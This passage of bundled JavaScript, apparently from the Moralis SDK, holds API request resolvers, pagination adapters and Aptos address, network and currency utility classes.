        if (!operation.isNullable) throw new Error("Operation ".concat(operation.name, " has invalid value for isNullable property"));
    }
    NullableOperationResolver.prototype._fetch = function(request) {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            var _a, url, urlSearchParams, body, jsonResponse;
            var _this = this;
            return $bd1f3f52e29d943b$var$__generator(this, function(_b) {
                switch(_b.label){
                    case 0:
                        _a = this.requestBuilder.prepareUrl(this.baseUrl, request), url = _a.url, urlSearchParams = _a.urlSearchParams;
                        body = this.requestBuilder.prepareBody(request);
                        return [
                            4 /*yield*/ ,
                            this.requestController.request({
                                method: this.operation.method,
                                url: url,
                                params: urlSearchParams,
                                headers: this.requestBuilder.prepareHeaders(),
                                data: body
                            })
                        ];
                    case 1:
                        jsonResponse = _b.sent();
                        return [
                            2 /*return*/ ,
                            new (0, $10891f2cb3e98601$export$355ff44b656e1f6d)(jsonResponse, function() {
                                return _this.operation.deserializeResponse(jsonResponse, request, _this.core);
                            })
                        ];
                }
            });
        });
    };
    return NullableOperationResolver;
}();
var $bd1f3f52e29d943b$export$3d62e0d1622344e8 = /** @class */ function() {
    function PaginatedOperationResolver(operation, baseUrl, core) {
        var _this = this;
        this.operation = operation;
        this.baseUrl = baseUrl;
        this.core = core;
        this.requestValidator = new (0, $10891f2cb3e98601$export$6191db1c44f01b8d)(this.operation);
        this.requestBuilder = new $bd1f3f52e29d943b$var$OperationRequestBuilder(this.operation, this.core);
        this.requestController = (0, $10891f2cb3e98601$export$cfde8cc919b877ff).create(this.core);
        this.fetch = function(request) {
            return $bd1f3f52e29d943b$var$__awaiter(_this, void 0, void 0, function() {
                var _a, url, urlSearchParams, body, jsonResponse, pagination, nextRequest;
                var _this = this;
                return $bd1f3f52e29d943b$var$__generator(this, function(_b) {
                    switch(_b.label){
                        case 0:
                            this.requestValidator.validate(request);
                            _a = this.requestBuilder.prepareUrl(this.baseUrl, request), url = _a.url, urlSearchParams = _a.urlSearchParams;
                            body = this.requestBuilder.prepareBody(request);
                            return [
                                4 /*yield*/ ,
                                this.requestController.request({
                                    method: this.operation.method,
                                    url: url,
                                    params: urlSearchParams,
                                    headers: this.requestBuilder.prepareHeaders(),
                                    data: body
                                })
                            ];
                        case 1:
                            jsonResponse = _b.sent();
                            pagination = (0, $10891f2cb3e98601$export$71369ea70577543f).read(jsonResponse);
                            nextRequest = (0, $10891f2cb3e98601$export$c592a7e9df7d80ee).resolve(this.operation.firstPageIndex, request, pagination);
                            return [
                                2 /*return*/ ,
                                new (0, $10891f2cb3e98601$export$8594df037fe69b54)(pagination, jsonResponse, function() {
                                    return _this.operation.deserializeResponse(jsonResponse, request, _this.core);
                                }, nextRequest ? function() {
                                    return _this.fetch(nextRequest);
                                } : undefined)
                            ];
                    }
                });
            });
        };
        if (operation.firstPageIndex !== 0 && operation.firstPageIndex !== 1) throw new Error("Operation ".concat(operation.name, " has invalid value for firstPageIndex property"));
    }
    return PaginatedOperationResolver;
}();
var $bd1f3f52e29d943b$export$ddc2c67cdf66d11d = /** @class */ function() {
    function OperationV3Resolver(operation, baseUrl, core) {
        this.operation = operation;
        this.baseUrl = baseUrl;
        this.core = core;
        this.requestController = (0, $10891f2cb3e98601$export$cfde8cc919b877ff).create(this.core);
    }
    OperationV3Resolver.prototype.request = function(request, body) {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            var urlParamNames, requestJSON, url, searchParams, bodyJSON, responseJson;
            var _this = this;
            return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                switch(_a.label){
                    case 0:
                        urlParamNames = this.operation.parameterNames.filter(function(name) {
                            return _this.operation.routePattern.includes("{".concat(name, "}"));
                        });
                        requestJSON = this.operation.serializeRequest ? this.operation.serializeRequest(request) : {};
                        url = urlParamNames.reduce(function(current, name) {
                            var value = requestJSON[name];
                            current = current.replace("{".concat(name, "}"), String(value));
                            return current;
                        }, this.operation.routePattern);
                        searchParams = this.operation.parameterNames.filter(function(name) {
                            return !urlParamNames.includes(name);
                        }).reduce(function(current, name) {
                            current[name] = requestJSON[name];
                            return current;
                        }, {});
                        bodyJSON = body && this.operation.serializeBody ? this.operation.serializeBody(body) : undefined;
                        return [
                            4 /*yield*/ ,
                            this.requestController.request({
                                url: url,
                                params: searchParams,
                                baseURL: this.resolveBaseUrl(request),
                                method: this.operation.httpMethod,
                                data: bodyJSON,
                                headers: this.prepareHeaders()
                            })
                        ];
                    case 1:
                        responseJson = _a.sent();
                        if (!responseJson || !this.operation.parseResponse) {
                            if (this.operation.hasResponse) throw new Error("Expected response, but API has returned empty response");
                            // TODO: find a better way to handle this
                            return [
                                2 /*return*/ ,
                                {
                                    response: null,
                                    responseJson: null
                                }
                            ];
                        }
                        return [
                            2 /*return*/ ,
                            {
                                response: this.operation.parseResponse(responseJson),
                                responseJson: responseJson
                            }
                        ];
                }
            });
        });
    };
    OperationV3Resolver.prototype.resolve = function(request, body) {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                switch(_a.label){
                    case 0:
                        return [
                            4 /*yield*/ ,
                            this.request(request, body)
                        ];
                    case 1:
                        return [
                            2 /*return*/ ,
                            _a.sent().response
                        ];
                }
            });
        });
    };
    /**
     * @deprecated This method is dedicated to V2 API only.
     */ OperationV3Resolver.prototype.fetch = function(request, body) {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            var data;
            return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                switch(_a.label){
                    case 0:
                        return [
                            4 /*yield*/ ,
                            this.request(request, body)
                        ];
                    case 1:
                        data = _a.sent();
                        return [
                            2 /*return*/ ,
                            new (0, $10891f2cb3e98601$export$355ff44b656e1f6d)(data.responseJson, function() {
                                return data.response;
                            })
                        ];
                }
            });
        });
    };
    OperationV3Resolver.prototype.resolveBaseUrl = function(request) {
        return typeof this.baseUrl === "string" ? this.baseUrl : this.baseUrl(request);
    };
    OperationV3Resolver.prototype.prepareHeaders = function() {
        var apiKey = this.core.config.get($bd1f3f52e29d943b$export$91cdabc826465a24.apiKey);
        var product = this.core.config.get((0, $10891f2cb3e98601$export$ebdca930f2e6a4b2).product);
        if (!apiKey) throw new (0, $10891f2cb3e98601$export$1e54abe040eff0f)({
            code: (0, $10891f2cb3e98601$export$dbc62e876b4a53ce).API_KEY_NOT_SET,
            message: "apiKey is not set"
        });
        var headers = $bd1f3f52e29d943b$export$5e0985b510477f07();
        headers["x-api-key"] = "".concat(apiKey);
        headers["Authorization"] = "Bearer ".concat(apiKey);
        if (product) headers["x-moralis-product"] = product;
        return headers;
    };
    return OperationV3Resolver;
}();
var $bd1f3f52e29d943b$export$85780aa4710a52a1 = /** @class */ function() {
    function PaginatedResponseV3Adapter(response, json, nextHandler) {
        this.response = response;
        this.json = json;
        this.nextHandler = nextHandler;
    }
    Object.defineProperty(PaginatedResponseV3Adapter.prototype, "result", {
        get: function() {
            if (!this.response.result) throw new Error("No result");
            return this.response.result;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(PaginatedResponseV3Adapter.prototype, "pagination", {
        get: function() {
            return {
                total: this.response.total || 0,
                page: this.response.page || 0,
                pageSize: this.response.pageSize || 0,
                cursor: this.response.cursor
            };
        },
        enumerable: false,
        configurable: true
    });
    PaginatedResponseV3Adapter.prototype.hasNext = function() {
        return !!this.nextHandler;
    };
    PaginatedResponseV3Adapter.prototype.next = function() {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                if (!this.nextHandler) throw new (0, $10891f2cb3e98601$export$a0860861f22cc326)({
                    code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).NO_DATA_FOUND,
                    message: "Page limit exceeded! Before call this method check an existence of the next page by .hasNext() method."
                });
                return [
                    2 /*return*/ ,
                    this.nextHandler()
                ];
            });
        });
    };
    /**
     * @deprecated Use `toJSON()` method from the result.
     */ PaginatedResponseV3Adapter.prototype.raw = function() {
        return this.json;
    };
    /**
     * @deprecated Use `toJSON()` method from the result.
     */ PaginatedResponseV3Adapter.prototype.toJSON = function() {
        return this.json;
    };
    return PaginatedResponseV3Adapter;
}();
var $bd1f3f52e29d943b$export$81107c8355a8d790 = /** @class */ function() {
    function PaginatedOperationV3Resolver(operation, baseUrl, core) {
        this.resolver = new $bd1f3f52e29d943b$export$ddc2c67cdf66d11d(operation, baseUrl, core);
    }
    /**
     * @deprecated This method is dedicated to V2 API only.
     */ PaginatedOperationV3Resolver.prototype.fetch = function(request, body) {
        return $bd1f3f52e29d943b$var$__awaiter(this, void 0, void 0, function() {
            var data, nextHandler;
            var _this = this;
            return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                switch(_a.label){
                    case 0:
                        return [
                            4 /*yield*/ ,
                            this.resolver.request(request, body)
                        ];
                    case 1:
                        data = _a.sent();
                        nextHandler = null;
                        if (data.responseJson.cursor) nextHandler = function() {
                            return $bd1f3f52e29d943b$var$__awaiter(_this, void 0, void 0, function() {
                                var nextRequest;
                                return $bd1f3f52e29d943b$var$__generator(this, function(_a) {
                                    nextRequest = $bd1f3f52e29d943b$var$__assign($bd1f3f52e29d943b$var$__assign({}, request), {
                                        cursor: data.response.cursor
                                    });
                                    return [
                                        2 /*return*/ ,
                                        this.fetch(nextRequest, body)
                                    ];
                                });
                            });
                        };
                        return [
                            2 /*return*/ ,
                            new $bd1f3f52e29d943b$export$85780aa4710a52a1(data.response, data.responseJson, nextHandler)
                        ];
                }
            });
        });
    };
    return PaginatedOperationV3Resolver;
}();
var $bd1f3f52e29d943b$var$ApiUtilsConfigSetup = /** @class */ function() {
    function ApiUtilsConfigSetup() {}
    ApiUtilsConfigSetup.register = function(config) {
        if (!config.hasKey($bd1f3f52e29d943b$export$91cdabc826465a24.apiKey)) config.registerKey($bd1f3f52e29d943b$export$91cdabc826465a24.apiKey);
    };
    return ApiUtilsConfigSetup;
}();
var $bd1f3f52e29d943b$export$31b619889b2e1a3d = /** @class */ function(_super) {
    $bd1f3f52e29d943b$var$__extends(ApiUtils, _super);
    function ApiUtils(core) {
        return _super.call(this, ApiUtils.moduleName, core) || this;
    }
    ApiUtils.create = function(core) {
        return new ApiUtils(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    ApiUtils.prototype.setup = function() {
        $bd1f3f52e29d943b$var$ApiUtilsConfigSetup.register(this.core.config);
    };
    ApiUtils.prototype.start = function() {
    // Nothing...
    };
    ApiUtils.moduleName = "api";
    return ApiUtils;
}((0, $10891f2cb3e98601$export$c3a9d7ff17e4f3ed));




var $a7ef34a427d74c9c$export$31ea1c798bcc37f9 = {
    defaultAptosNetwork: {
        name: "defaultAptosNetwork",
        defaultValue: "mainnet"
    }
};
var $a7ef34a427d74c9c$export$2adb88bd8388861 = /** @class */ function() {
    function CommonAptosUtilsConfigSetup() {}
    CommonAptosUtilsConfigSetup.register = function(config) {
        config.registerKey($a7ef34a427d74c9c$export$31ea1c798bcc37f9.defaultAptosNetwork);
    };
    return CommonAptosUtilsConfigSetup;
}();
/*! noble-hashes - MIT License (c) 2022 Paul Miller (paulmillr.com) */ const $a7ef34a427d74c9c$var$isLE = new Uint8Array(new Uint32Array([
    0x11223344
]).buffer)[0] === 0x44;
// There is almost no big endian hardware, but js typed arrays uses platform specific endianness.
// So, just to be sure not to corrupt anything.
if (!$a7ef34a427d74c9c$var$isLE) throw new Error("Non little-endian hardware is not supported");
const $a7ef34a427d74c9c$var$hexes = Array.from({
    length: 256
}, (v, i)=>i.toString(16).padStart(2, "0"));
/**
 * @example bytesToHex(Uint8Array.from([0xde, 0xad, 0xbe, 0xef]))
 */ function $a7ef34a427d74c9c$var$bytesToHex(uint8a) {
    // pre-caching improves the speed 6x
    if (!(uint8a instanceof Uint8Array)) throw new Error("Uint8Array expected");
    let hex = "";
    for(let i = 0; i < uint8a.length; i++)hex += $a7ef34a427d74c9c$var$hexes[uint8a[i]];
    return hex;
}
/**
 * @example hexToBytes('deadbeef')
 */ function $a7ef34a427d74c9c$var$hexToBytes(hex) {
    if (typeof hex !== "string") throw new TypeError("hexToBytes: expected string, got " + typeof hex);
    if (hex.length % 2) throw new Error("hexToBytes: received invalid unpadded hex");
    const array = new Uint8Array(hex.length / 2);
    for(let i = 0; i < array.length; i++){
        const j = i * 2;
        const hexByte = hex.slice(j, j + 2);
        const byte = Number.parseInt(hexByte, 16);
        if (Number.isNaN(byte) || byte < 0) throw new Error("Invalid byte sequence");
        array[i] = byte;
    }
    return array;
}
/**
 * Copied (and remove obsolete functionalities) from https://github.com/aptos-labs/aptos-core/blob/main/ecosystem/typescript/sdk/src/hex_string.ts because
 * - We only care about address validation and conversion, this is a dependency for AccountAddress
 * - Resolving this dependency in UMD gives dependency errors
 */ /**
 * A util class for working with hex strings.
 * Hex strings are strings that are prefixed with `0x`
 */ var $a7ef34a427d74c9c$var$HexString = /** @class */ function() {
    /**
     * Creates new HexString instance from regular string. If specified string already starts with "0x" prefix,
     * it will not add another one
     * @param hexString String to convert
     * @example
     * ```
     *  const string = "string";
     *  new HexString(string); // "0xstring"
     * ```
     */ function HexString(hexString) {
        if (hexString.startsWith("0x")) this.hexString = hexString;
        else this.hexString = "0x".concat(hexString);
    }
    /**
     * Creates new hex string from Buffer
     * @param buffer A buffer to convert
     * @returns New HexString
     */ HexString.fromBuffer = function(buffer) {
        return HexString.fromUint8Array(buffer);
    };
    /**
     * Creates new hex string from Uint8Array
     * @param arr Uint8Array to convert
     * @returns New HexString
     */ HexString.fromUint8Array = function(arr) {
        return new HexString($a7ef34a427d74c9c$var$bytesToHex(arr));
    };
    /**
     * Ensures `hexString` is instance of `HexString` class
     * @param hexString String to check
     * @returns New HexString if `hexString` is regular string or `hexString` if it is HexString instance
     * @example
     * ```
     *  const regularString = "string";
     *  const hexString = new HexString("string"); // "0xstring"
     *  HexString.ensure(regularString); // "0xstring"
     *  HexString.ensure(hexString); // "0xstring"
     * ```
     */ HexString.ensure = function(hexString) {
        if (typeof hexString === "string") return new HexString(hexString);
        return hexString;
    };
    /**
     * Getter for inner hexString
     * @returns Inner hex string
     */ HexString.prototype.hex = function() {
        return this.hexString;
    };
    /**
     * Getter for inner hexString without prefix
     * @returns Inner hex string without prefix
     * @example
     * ```
     *  const hexString = new HexString("string"); // "0xstring"
     *  hexString.noPrefix(); // "string"
     * ```
     */ HexString.prototype.noPrefix = function() {
        return this.hexString.slice(2);
    };
    /**
     * Overrides default `toString` method
     * @returns Inner hex string
     */ HexString.prototype.toString = function() {
        return this.hex();
    };
    /**
     * Trimmes extra zeroes in the begining of a string
     * @returns Inner hexString without leading zeroes
     * @example
     * ```
     *  new HexString("0x000000string").toShortString(); // result = "0xstring"
     * ```
     */ HexString.prototype.toShortString = function() {
        var trimmed = this.hexString.replace(/^0x0*/, "");
        return "0x".concat(trimmed);
    };
    /**
     * Converts hex string to a Uint8Array
     * @returns Uint8Array from inner hexString without prefix
     */ HexString.prototype.toUint8Array = function() {
        return Uint8Array.from($a7ef34a427d74c9c$var$hexToBytes(this.noPrefix()));
    };
    return HexString;
}();
/**
 * Copied (and remove obsolete functionalities) from https://github.com/aptos-labs/aptos-core/blob/main/ecosystem/typescript/sdk/src/aptos_types/account_address.ts because
 * - We only care about address validation and conversion
 * - Resolving this dependency in UMD gives dependency errors
 */ var $a7ef34a427d74c9c$var$AccountAddress = /** @class */ function() {
    function AccountAddress(address) {
        if (address.length !== AccountAddress.LENGTH) throw new Error("Expected address of length 32");
        this.address = address;
    }
    /**
     * Creates AccountAddress from a hex string.
     * @param addr Hex string can be with a prefix or without a prefix,
     *   e.g. '0x1aa' or '1aa'. Hex string will be left padded with 0s if too short.
     */ AccountAddress.fromHex = function(addr) {
        var address = $a7ef34a427d74c9c$var$HexString.ensure(addr);
        // If an address hex has odd number of digits, padd the hex string with 0
        // e.g. '1aa' would become '01aa'.
        if (address.noPrefix().length % 2 !== 0) address = new $a7ef34a427d74c9c$var$HexString("0".concat(address.noPrefix()));
        var addressBytes = address.toUint8Array();
        if (addressBytes.length > AccountAddress.LENGTH) // eslint-disable-next-line quotes
        throw new Error("Hex string is too long. Address's length is 32 bytes.");
        else if (addressBytes.length === AccountAddress.LENGTH) return new AccountAddress(addressBytes);
        var res = new Uint8Array(AccountAddress.LENGTH);
        res.set(addressBytes, AccountAddress.LENGTH - addressBytes.length);
        return new AccountAddress(res);
    };
    /**
     * Checks if the string is a valid AccountAddress
     * @param addr Hex string can be with a prefix or without a prefix,
     *   e.g. '0x1aa' or '1aa'. Hex string will be left padded with 0s if too short.
     */ AccountAddress.isValid = function(addr) {
        // At least one zero is required
        if (addr === "") return false;
        var address = $a7ef34a427d74c9c$var$HexString.ensure(addr);
        // If an address hex has odd number of digits, padd the hex string with 0
        // e.g. '1aa' would become '01aa'.
        if (address.noPrefix().length % 2 !== 0) address = new $a7ef34a427d74c9c$var$HexString("0".concat(address.noPrefix()));
        var addressBytes = address.toUint8Array();
        return addressBytes.length <= AccountAddress.LENGTH;
    };
    AccountAddress.LENGTH = 32;
    AccountAddress.CORE_CODE_ADDRESS = AccountAddress.fromHex("0x1");
    return AccountAddress;
}();
/**
 * A representation of an address on the Aptos network.
 *
 * Use this class any time you work with an address.
 *
 * @category DataType
 */ var $a7ef34a427d74c9c$export$4bf08dd0aef06cf6 = /** @class */ function() {
    function AptosAddress(address) {
        this.address = address;
    }
    /**
     * Create a new instance of AptosAddress from any valid address input.
     *
     * @example `const address = AptosAddress.create("0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90")`
     * @throws an error when a passed address is invalid.
     */ AptosAddress.create = function(address) {
        if (address instanceof AptosAddress) return address;
        return new AptosAddress(AptosAddress.parse(address));
    };
    AptosAddress.fromJSON = function(json) {
        return AptosAddress.create(json);
    };
    AptosAddress.parse = function(address) {
        try {
            if (!$a7ef34a427d74c9c$var$AccountAddress.isValid(address)) throw new Error("Address is invalid");
        } catch (e) {
            throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
                code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
                message: "Invalid address provided: ".concat(address),
                cause: e
            });
        }
        if (address.startsWith("0x")) address = address.substring(2);
        var addr = address.padStart(64, "0");
        return "0x".concat(addr);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ AptosAddress.prototype.format = function() {
        return this.address;
    };
    /**
     * Check the equality between two Aptos addresses
     * @example `AptosAddress.equals("0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90", "0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90")`
     */ AptosAddress.equals = function(addressA, addressB) {
        return AptosAddress.create(addressA).equals(addressB);
    };
    /**
     * Checks the equality of the current address with another Aptos address.
     * @example `address.equals("0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90")`
     * @example `address.equals(AptosAddress.create("0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90"))`
     */ AptosAddress.prototype.equals = function(address) {
        return this.address === AptosAddress.create(address).address;
    };
    /**
     * @returns a string representing the address.
     * @example address.toString(); // "0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90"
     */ AptosAddress.prototype.toString = function() {
        return this.address;
    };
    /**
     * @returns a string representing the address.
     * @example address.toJSON(); // "0x54ad3d30af77b60d939ae356e6606de9a4da67583f02b962d2d3f2e481484e90"
     */ AptosAddress.prototype.toJSON = function() {
        return this.address;
    };
    Object.defineProperty(AptosAddress.prototype, "short", {
        /**
         * @returns a string representing the address, the leading zeros are removed from the address.
         * @example address.short; // "0x1"
         */ get: function() {
            var address = this.address.substring(2).replace(/^0+/, "");
            return "0x".concat(address);
        },
        enumerable: false,
        configurable: true
    });
    return AptosAddress;
}();
var $a7ef34a427d74c9c$var$aptosNetworkNames = [
    "mainnet",
    "testnet",
    "devnet"
];
var $a7ef34a427d74c9c$var$aptosChainIdToNetworkNames = {
    "1": "mainnet",
    "2": "testnet"
};
/**
 * A representation of a Aptos network.
 *
 * @category DataType
 */ var $a7ef34a427d74c9c$export$5f4e060315c73a8 = /** @class */ function() {
    function AptosNetwork(network) {
        this.network = network;
    }
    Object.defineProperty(AptosNetwork, "MAINNET", {
        /**
         * Returns MAINNET network
         *
         * @example AptosNetwork.MAINNET
         */ get: function() {
            return AptosNetwork.create("mainnet");
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosNetwork, "TESTNET", {
        /**
         * Returns TESTNET network
         *
         * @example AptosNetwork.MAINNET
         */ get: function() {
            return AptosNetwork.create("testnet");
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosNetwork, "DEVNET", {
        /**
         * Returns DEVNET network
         *
         * @example AptosNetwork.MAINNET
         */ get: function() {
            return AptosNetwork.create("devnet");
        },
        enumerable: false,
        configurable: true
    });
    /**
     * Create a new instance of AptosNetwork from any valid network input.
     *
     * @example `const network = AptosNetwork.create("mainnet")`
     * @throws an error when a passed network is invalid.
     */ AptosNetwork.create = function(network) {
        return network instanceof AptosNetwork ? network : new AptosNetwork(AptosNetwork.parse(network));
    };
    AptosNetwork.parse = function(network) {
        var _a;
        if (typeof network !== "string") throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Aptos network is not supported: ".concat(network)
        });
        var networkName = (_a = $a7ef34a427d74c9c$var$aptosChainIdToNetworkNames[network]) !== null && _a !== void 0 ? _a : network;
        if (!$a7ef34a427d74c9c$var$aptosNetworkNames.includes(networkName)) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Aptos network is not supported: ".concat(network)
        });
        return networkName;
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ AptosNetwork.prototype.format = function() {
        return this.network;
    };
    /**
     * Checks the equality of the current network with another Aptos network.
     * @example `network.equals("mainnet")`
     * @example `network.equals(AptosNetwork.create("mainnet"))`
     */ AptosNetwork.prototype.equals = function(network) {
        return this.network === AptosNetwork.create(network).network;
    };
    /**
     * @returns a string representing the network.
     * @example network.toJSON(); // "mainnet"
     */ AptosNetwork.prototype.toJSON = function() {
        return this.network;
    };
    /**
     * @returns a string representing the network.
     * @example network.toString(); // "mainnet"
     */ AptosNetwork.prototype.toString = function() {
        return this.network;
    };
    return AptosNetwork;
}();
var $a7ef34a427d74c9c$var$unitToDecimals = {
    aptos: 8,
    octas: 0
};
/**
 * The AptosNative class is a MoralisData that references to the value of Aptos native currency APT
 *
 * @category DataType
 */ var $a7ef34a427d74c9c$export$5d1e9aab577c748d = /** @class */ function() {
    function AptosNative(rawValue) {
        this.rawValue = rawValue;
    }
    /**
     * Create a new instance of AptosNative from any valid {@link AptosNativeInput} value.
     * @param value - the value to create the AptosNative from
     * @param unit - the unit of the value (optional), defaults to `aptos`
     * @returns a new instance of AptosNative
     * @example
     * ```ts
     * const native = AptosNative.create(2, 'octas');
     * const native = AptosNative.create(2);
     *```
     */ AptosNative.create = function(value, unit) {
        if (value instanceof AptosNative) return value;
        return new AptosNative(AptosNative.parse(value, unit));
    };
    AptosNative.fromJSON = function(json) {
        return AptosNative.create(json, "octas");
    };
    AptosNative.parse = function(value, unit) {
        if (unit === void 0) unit = "aptos";
        var decimal;
        if (typeof unit === "number") decimal = unit;
        else if ($a7ef34a427d74c9c$var$unitToDecimals[unit] !== undefined) decimal = $a7ef34a427d74c9c$var$unitToDecimals[unit];
        else throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Not supported Aptos unit: ".concat(unit)
        });
        return (0, $10891f2cb3e98601$export$d97aa349ed20696).fromDecimal(value.toString(), decimal);
    };
    /**
     * Compares two AptosNativeish values.
     * @param valueA - the first value to compare
     * @param valueB - the second value to compare
     * @returns true if the values are equal
     * @example
     * ```ts
     * AptosNative.equals(AptosNative.create(1), AptosNative.create(1)); // true
     * ```
     */ AptosNative.equals = function(valueA, valueB) {
        var aptosNativeA = AptosNative.create(valueA);
        var aptosNativeB = AptosNative.create(valueB);
        return aptosNativeA.octas === aptosNativeB.octas;
    };
    /**
     * Compares AptosNative with current instance.
     * @param value - the value to compare with
     * @returns true if the values are equal
     * @example
     * ```ts
     * const native = AptosNative.create(2, 'octas');
     * native.equals(AptosNative.create(1)); // false
     * ```
     */ AptosNative.prototype.equals = function(value) {
        return AptosNative.equals(this, value);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ AptosNative.prototype.format = function() {
        return this.octas;
    };
    /**
     * Converts the AptosNative to a string.
     * @returns the value of the AptosNative as a string
     * @example `native.toJSON()`
     */ AptosNative.prototype.toJSON = function() {
        return this.octas;
    };
    /**
     * Converts the AptosNative to a string.
     * @returns the value of the AptosNative as a string
     * @example `native.toString()`
     */ AptosNative.prototype.toString = function() {
        return this.octas;
    };
    Object.defineProperty(AptosNative.prototype, "value", {
        /**
         * @returns the value of the AptosNative as a BigNumber
         * @example `native.value`
         */ get: function() {
            return this.rawValue;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosNative.prototype, "aptos", {
        /**
         * Converts the AptosNative to an aptos unit.
         * @returns the value of the AptosNative as an aptos string
         * @example `native.aptos`
         */ get: function() {
            return this.rawValue.toDecimal($a7ef34a427d74c9c$var$unitToDecimals["aptos"]);
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosNative.prototype, "octas", {
        /**
         * Converts the AptosNative to a string.
         * @returns the value of the AptosNative as a string
         * @example `native.lamports`
         */ get: function() {
            return this.rawValue.toString();
        },
        enumerable: false,
        configurable: true
    });
    return AptosNative;
}();
var $a7ef34a427d74c9c$export$6779c8260151004a = /** @class */ function() {
    function AptosNetworkResolver() {}
    AptosNetworkResolver.resolve = function(network, core) {
        if (!network) network = core.config.get($a7ef34a427d74c9c$export$31ea1c798bcc37f9.defaultAptosNetwork);
        return $a7ef34a427d74c9c$export$5f4e060315c73a8.create(network).network;
    };
    return AptosNetworkResolver;
}();
/******************************************************************************
Copyright (c) Microsoft Corporation.

Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.

THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ /* global Reflect, Promise */ var $a7ef34a427d74c9c$var$extendStatics = function(d, b) {
    $a7ef34a427d74c9c$var$extendStatics = Object.setPrototypeOf || ({
        __proto__: []
    }) instanceof Array && function(d, b) {
        d.__proto__ = b;
    } || function(d, b) {
        for(var p in b)if (Object.prototype.hasOwnProperty.call(b, p)) d[p] = b[p];
    };
    return $a7ef34a427d74c9c$var$extendStatics(d, b);
};
function $a7ef34a427d74c9c$var$__extends(d, b) {
    if (typeof b !== "function" && b !== null) throw new TypeError("Class extends value " + String(b) + " is not a constructor or null");
    $a7ef34a427d74c9c$var$extendStatics(d, b);
    function __() {
        this.constructor = d;
    }
    d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
}
var $a7ef34a427d74c9c$export$6b8defbdbe073676 = /** @class */ function(_super) {
    $a7ef34a427d74c9c$var$__extends(CommonAptosUtils, _super);
    function CommonAptosUtils(core) {
        return _super.call(this, CommonAptosUtils.moduleName, core) || this;
    }
    CommonAptosUtils.create = function(core) {
        return new CommonAptosUtils(core !== null && core !== void 0 ? core : (0, $10891f2cb3e98601$export$211989d19e9f0ff7).getDefault());
    };
    CommonAptosUtils.prototype.setup = function() {
        $a7ef34a427d74c9c$export$2adb88bd8388861.register(this.core.config);
    };
    CommonAptosUtils.prototype.start = function() {
    // Nothing
    };
    Object.defineProperty(CommonAptosUtils.prototype, "AptosAddress", {
        get: function() {
            return $a7ef34a427d74c9c$export$4bf08dd0aef06cf6;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonAptosUtils.prototype, "AptosNative", {
        get: function() {
            return $a7ef34a427d74c9c$export$5d1e9aab577c748d;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(CommonAptosUtils.prototype, "AptosNetwork", {
        get: function() {
            return $a7ef34a427d74c9c$export$5f4e060315c73a8;
        },
        enumerable: false,
        configurable: true
    });
    CommonAptosUtils.moduleName = "aptosUtils";
    return CommonAptosUtils;
}((0, $10891f2cb3e98601$export$c3a9d7ff17e4f3ed));
// $ref: #/components/schemas/NFTTokenResponse/properties/default_properties
// typeName: NFTTokenResponse_default_properties
var $a7ef34a427d74c9c$export$f8bdf453dd4c34aa = /** @class */ function() {
    function AptosNFTTokenResponseDefaultProperties() {}
    AptosNFTTokenResponseDefaultProperties.create = function(input) {
        return input;
    };
    AptosNFTTokenResponseDefaultProperties.fromJSON = function(json) {
        return json;
    };
    return AptosNFTTokenResponseDefaultProperties;
}();
